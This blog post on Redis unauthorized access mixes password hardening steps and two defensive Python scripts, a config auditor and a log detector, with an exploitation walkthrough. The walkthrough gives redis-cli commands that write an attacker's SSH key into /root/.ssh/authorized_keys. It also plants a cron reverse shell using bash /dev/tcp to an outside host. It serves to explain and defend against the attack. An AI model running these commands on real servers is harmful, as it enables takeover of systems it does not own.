2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
Hello, big shots! I haven't written a blog post in a long time. Recently I found a Redis unauthorized access vulnerability and exploited it, so here I share this vulnerability, which can directly yield server access.
0x01: Redis basics
By default Redis requires no password: anyone who knows the host and port of a Redis server can connect and use it. That is a real security problem, so enable Redis password authentication to harden the server.
Modify the configuration file
The Redis configuration file is /etc/redis.conf by default. Find the following line:
#requirepass foobared
Remove the leading comment character and set the password you want:
requirepass myPassword (where myPassword is the password to be set)
Restart Redis
If Redis is configured as a service, restart it with:
service redis restart
If Redis is not configured as a service, restart it with:
/usr/local/bin/redis-cli shutdown
/usr/local/bin/redis-server /etc/redis.conf
Login verification
After the authentication password is set, the client must pass it with the -a parameter when logging in. Without this parameter the connection still succeeds, but the session has no permission to run commands:
$ ./redis-cli -h 127.0.0.1 -p 6379
127.0.0.1:6379> keys *
(error) NOAUTH Authentication required.
Log in with password authentication and verify that commands are permitted:
$ ./redis-cli -h 127.0.0.1 -p 6379 -a myPassword
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) "myPassword"
Output like the above indicates that Redis password authentication was configured successfully.
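A way to check a redis.conf for the settings discussed in this section before the server goes live. This is an added example, not code from the post: it parses the file format Redis uses (one directive per line, # comments, shell-style quoting) and reports the weak settings that make the rest of this post possible. Both configuration texts below are constructed samples; the check for rename-command CONFIG is an extra hardening step beyond what the post configures.

```python
"""Audit a redis.conf for weak settings (added example, constructed sample configs)."""
from __future__ import annotations

import shlex

# Constructed sample: a stock-looking redis.conf with authentication still commented out.
WEAK_CONF = """
# Redis configuration (constructed sample)
bind 0.0.0.0
protected-mode no
port 6379
#requirepass foobared
dir /root/.ssh/
dbfilename authorized_keys
"""

# Constructed sample: the same file after enabling authentication and restricting access.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
port 6379
requirepass myPassword
dir /var/lib/redis
dbfilename dump.rdb
rename-command CONFIG ""
"""

# "foobared" is the commented-out default shipped in redis.conf; the rest are common guesses.
KNOWN_WEAK_PASSWORDS = {"foobared", "redis", "123456", "password", "admin"}


def parse_redis_conf(text: str) -> dict[str, list[list[str]]]:
    """Return directive name -> list of argument lists (a directive may appear more than once)."""
    directives: dict[str, list[list[str]]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # redis.conf quotes arguments the same way a shell does
        if not parts:
            continue
        directives.setdefault(parts[0].lower(), []).append(parts[1:])
    return directives


def audit_redis_conf(text: str) -> list[str]:
    """Return a list of findings; an empty list means none of the audited settings is weak."""
    conf = parse_redis_conf(text)
    findings: list[str] = []

    def last(name: str) -> list[str] | None:
        values = conf.get(name)
        return values[-1] if values else None  # Redis applies the last occurrence

    password = last("requirepass")
    if not password or not password[0]:
        findings.append("requirepass is not set: any client that can reach the port has full access")
    elif password[0] in KNOWN_WEAK_PASSWORDS or len(password[0]) < 8:
        findings.append("requirepass is a default or very short password")

    bind = last("bind")
    if bind is None or any(addr in ("0.0.0.0", "::", "*") for addr in bind):
        findings.append("bind is missing or includes a wildcard address: Redis listens on every interface")

    if (last("protected-mode") or ["yes"])[0].lower() == "no":
        findings.append("protected-mode is off, so the no-password safety net is disabled")

    d = last("dir")
    if d and ("/.ssh" in d[0] or d[0].startswith(("/var/spool/cron", "/etc/cron"))):
        findings.append(f"dir {d[0]} points at an SSH or cron directory; RDB snapshots would land there")

    fn = last("dbfilename")
    if fn and not fn[0].endswith(".rdb"):
        findings.append(f"dbfilename {fn[0]} is not an .rdb file name")

    # CONFIG SET is what lets a client move dir/dbfilename at runtime; renaming it closes that door.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG is not renamed or disabled, so dir and dbfilename can be changed at runtime")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or "no findings")
```

The audit reads only the file, so it cannot tell whether the process runs as root; check that separately with the service definition or ps output.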
0x02: Vulnerability Description
Description:
Because of improper configuration, Redis can be accessed without authentication and is exploited maliciously by attackers.
1) An attacker who reaches the internal data without authentication can disclose sensitive information, and can also run a malicious FLUSHALL to wipe all data.
2) An attacker can execute Lua code through EVAL, or write backdoor files to disk through the data backup (snapshot) function.
3) If Redis runs as root, an attacker can write an SSH public key into the root account's key file and log in to the victim server directly over SSH.
Hazard:
1) The vulnerability can be exploited to write a scheduled task that spawns a reverse shell.
2) The vulnerability can be exploited to write an SSH public key for remote login.
0x03: Exploitation
Connect to the target with a Redis client. For Windows, a redis-cli.exe build is available at https://github.com/dmajkic/redis/downloads; connect with redis-cli.exe.
0x04: Advanced Exploitation
Principle:
1) SSH password-free login. On Linux, SSH login without a password uses public/private key authentication: first create a key pair on the client (public key: ~/.ssh/id_rsa.pub; private key: ~/.ssh/id_rsa), then place the public key on the server in ~/.ssh/authorized_keys and keep the private key. When logging in, the ssh client uses the private key to prove it matches a public key on the server; if it matches, the login succeeds. For details see "SSH password-free login to a remote server" (jingyan.baidu.com/article/2fb0ba4043124a00f2ec5f0f.html).
2) Redis can be managed remotely through redis-cli, including setting the directory and file name used for its database snapshot. The method is as follows:
config set dir /xxx
config set dbfilename xxxx
set xxxx "xxx"
save
Vulnerability conditions
1. The Redis service runs as root.
2. The Redis service has no password authentication or uses a weak password.
3. The server runs SSH and allows key login, so a public key written remotely allows direct login to the remote server.
First generate a key pair locally:
Then connect to the target Redis server with redis-cli and run the following commands:
config set dir /root/.ssh/
config set dbfilename authorized_keys
set xxxx "\n\n\nssh-rsa key_pub\n\n"
where key_pub is the public key generated in the previous step. The public key is thus saved on the remote server, so logging in no longer requires the account password. Servers have already been compromised through this vulnerability, with the written public key found in the Redis database; users are advised to check their internal network immediately.
Reverse shell
1. Log in with telnet (redis-cli also works):
telnet 192.168.236.130 6379   // unauthenticated login
config set dir /var/spool/cron/   // set the snapshot directory (CONFIG SET adjusts the running server's configuration without a restart); each user's crontab file lives under /var/spool/cron/
set -.- "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.236.129/9999 0>&1\n\n\n"   // writes the reverse shell straight into the current user's crontab; the surrounding newlines are essential
2. Catch the shell with nc.
3. View the crontab tasks on CentOS.
0x06: Fixes
The vulnerability is fixed as follows:
1) Do not start the Redis service with root privileges;
2) Enable password authentication for Redis access and add IP access restrictions;
3) Avoid exposing the SSH service directly to the public network.
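The fixes above prevent the attack; the following added example (not part of the post) shows how a defender can spot it in progress. It reads Redis MONITOR output, whose real format is <unix time> [<db> <client ip:port>] "CMD" "arg" ..., and flags the CONFIG SET dir / CONFIG SET dbfilename / SAVE sequence that both the SSH-key and the cron variants in this post rely on. The capture below is constructed for the demonstration; the client addresses and paths are sample values.

```python
"""Flag snapshot-redirection in Redis MONITOR output (added example, constructed capture)."""
from __future__ import annotations

import posixpath
import re
import shlex
from dataclasses import dataclass

MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<argv>.+)$')

# Directories where a written RDB snapshot becomes an SSH key file or a cron job.
SENSITIVE_DIR_MARKERS = ("/.ssh", "/var/spool/cron", "/etc/cron")

# Constructed MONITOR capture: one client redirects the snapshot into .ssh, one does ordinary
# work, and one aims at the cron spool (the cron variant uses a user name as dbfilename).
SAMPLE_MONITOR = """\
1700000000.100000 [0 192.168.236.129:50312] "CONFIG" "SET" "dir" "/root/.ssh/"
1700000000.200000 [0 192.168.236.129:50312] "CONFIG" "SET" "dbfilename" "authorized_keys"
1700000000.300000 [0 192.168.236.129:50312] "SET" "xxxx" "ssh-rsa PLACEHOLDER_PUBLIC_KEY"
1700000000.400000 [0 192.168.236.129:50312] "SAVE"
1700000001.000000 [0 10.0.0.5:41000] "GET" "session:42"
1700000001.500000 [0 10.0.0.5:41000] "CONFIG" "GET" "requirepass"
1700000002.000000 [0 203.0.113.7:6000] "CONFIG" "SET" "dir" "/var/spool/cron/"
1700000002.100000 [0 203.0.113.7:6000] "CONFIG" "SET" "dbfilename" "root"
1700000002.200000 [0 203.0.113.7:6000] "BGSAVE"
"""


@dataclass(frozen=True)
class Alert:
    timestamp: float
    client: str
    reason: str


def parse_monitor_line(line: str) -> tuple[float, str, list[str]] | None:
    """Split one MONITOR line into (timestamp, client address, argv); None if it does not match."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return float(m["ts"]), m["client"], shlex.split(m["argv"])


def is_sensitive_dir(path: str) -> bool:
    return any(marker in path for marker in SENSITIVE_DIR_MARKERS)


def detect_snapshot_abuse(monitor_text: str) -> list[Alert]:
    """Track suspicious dir/dbfilename per client and alert on them and on the SAVE that uses them."""
    pending: dict[str, dict[str, str]] = {}
    alerts: list[Alert] = []
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        ts, client, argv = parsed
        if not argv:
            continue
        cmd = argv[0].upper()
        state = pending.setdefault(client, {})
        if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            key, value = argv[2].lower(), argv[3]
            if key == "dir" and is_sensitive_dir(value):
                state["dir"] = value
                alerts.append(Alert(ts, client, f"CONFIG SET dir to sensitive path {value}"))
            elif key == "dbfilename" and not value.endswith(".rdb"):
                state["dbfilename"] = value
                alerts.append(Alert(ts, client, f"CONFIG SET dbfilename to non-RDB name {value}"))
        elif cmd in ("SAVE", "BGSAVE") and state:
            # The snapshot is what actually creates the file, so report the resolved target path.
            target = posixpath.join(state.get("dir", "(dir unchanged)"),
                                    state.get("dbfilename", "(dbfilename unchanged)"))
            alerts.append(Alert(ts, client, f"{cmd} after suspicious CONFIG SET: snapshot written to {target}"))
    return alerts


if __name__ == "__main__":
    for alert in detect_snapshot_abuse(SAMPLE_MONITOR):
        print(f"{alert.timestamp:.0f} {alert.client}: {alert.reason}")
```

MONITOR adds noticeable load on a busy instance, so in practice the same parser is better pointed at a short capture taken during an investigation or at a command audit log in this format; the per-client state is what separates a legitimate CONFIG SET dir during maintenance from the two-step redirection followed by a SAVE.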